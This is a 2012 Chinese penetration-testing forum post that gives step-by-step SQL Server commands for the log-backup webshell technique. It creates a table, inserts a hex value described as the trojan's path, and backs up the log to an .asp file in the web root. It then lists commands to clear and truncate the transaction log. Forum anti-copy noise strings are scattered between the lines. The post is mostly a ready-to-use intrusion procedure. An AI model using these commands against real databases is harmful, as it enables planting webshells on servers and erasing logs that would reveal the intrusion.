中国网络渗透测试联盟
标题:
差异备份提权
[打印本页]
作者:
admin
时间:
2012-9-15 14:38
标题:
差异备份提权
select * from master.dbo.sysdatabases 列出所有列的记录
& o- C7 [7 m/ c! s
1 I0 b8 a+ N* ~4 j8 |
select name from master.dbo.sysdatabases 仅列出name列的记录
4 \3 z9 C4 c9 @8 _$ ]
9 A# z4 v4 m( w% V4 o
注意:可以利用log和数据库备份两上都行,log备份不成功用数据库备份
- k [* C& E5 r9 e
# g+ g0 s& X, D3 X
alter database 数据库名 set RECOVERY FULL--
3 w7 i) ]5 s: _+ {+ s2 p2 s8 z* P
' D6 x4 i8 F- F; m$ ^
create table cmd (a image)-- \**cmd是创建的临时表
& \& t( c! y8 d- T6 j2 Q$ T# q
9 Z' k2 d0 d* F E+ A# t
backup log 数据库名 to disk = 'f:\wwwroot\1.asp' with init--
f( b( m$ M% ~0 H0 g# v" j
' ]- Q! M2 |! i" C8 i( O; c; [
insert into cmd(a) values (0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)--
7 {' `9 q7 d# j: a6 Z) b0 J U+ {6 W
( t- H, {3 m8 s- s8 }& r) R
//木马存放路径(转换16进制0x130a0d0a替换原来0x最后添加0d0a要多加几个)
" H3 I7 H. C% p& Q/ k) V" G' I
0 E1 U7 l( d- T/ A$ m' x' J" [2 c
backup log 数据库名 to disk = 'f:\wwwroot\1.asp'-- (要备份的目录)
# r; ~: t* |7 V% i
. ~9 B7 P E( A7 D3 o- _
drop table cmd--
9 W. _, C8 J2 t8 Y
4 v: g) V: n% v! p4 U4 Q5 t
# ?7 A0 {( A* g* S
f:\
2 W0 ~3 I+ x/ u$ s: P
16进制转换(0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)
" k% d* f0 ~" E% c6 _( p
" R( @$ i4 e! J7 }. X. c, F9 i5 Y
最好多加几个回车0d0a,要不会出错哈
3 V) T0 k# S& x
+ G2 Y/ f2 R8 D8 x# Q. U4 _
9 e% ]* y3 n/ E4 M' _, U
SQL Server日志清空方法
2 R) b+ t; T' p+ L. a( Z4 x; A! Q! F/ h
' p3 e" i' ^7 D2 k' l
在查询分析器中顺序执行以下三步,其中 databasename 为你的数据库文件名
% j; L" |3 P* d& p" G
1.清空日志:DUMP TRANSACTION databasename WITH NO_LOG
& {. t8 e+ o. m4 D1 L. N, @# j, p
1 o# r+ p2 U6 C
2.截断事务日志:BACKUP LOG databasename WITH NO_LOG
6 U" c2 n5 ^6 `: P# z- b/ I
0 }) `" z: L9 [( m8 X- L" N3 D
3.收缩数据库:DBCC SHRINKDATABASE(databasename)
$ P" p( A) q) m3 E& {
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2